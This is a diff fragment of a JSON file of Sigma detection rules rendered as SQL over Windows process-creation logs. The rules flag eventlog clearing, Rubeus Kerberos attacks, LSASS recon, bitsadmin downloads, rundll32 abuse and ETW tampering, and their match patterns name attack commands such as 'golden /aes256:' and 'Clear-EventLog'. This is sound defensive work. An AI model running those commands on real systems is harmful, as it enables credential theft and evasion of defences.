'%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "title": "Suspicious Execution of Hostname", + "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of hostname to get information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hostname_execution.yml" + }, + { + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", + "tags": [ + "attack.collection", + "attack.t1119" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_susp_recon.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Windows Share Mount Via Net.EXE", - "id": "f117933c-980c-4f78-b384-e3d838111165", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects when a share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate activity by administrators and scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_share.yml" + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "author": "Florian Roth (Nextron Systems)", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "status": "test", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Suspicious High IntegrityLevel Conhost Legacy Option", - "id": "3037d961-21e9-4732-b27a-637bcc7bf539", - "status": "experimental", - "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", - "author": "frack113", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Very Likely, including launching cmd.exe via Run As Administrator" + "System administrator Usage" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_legacy_option.yml" + "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ 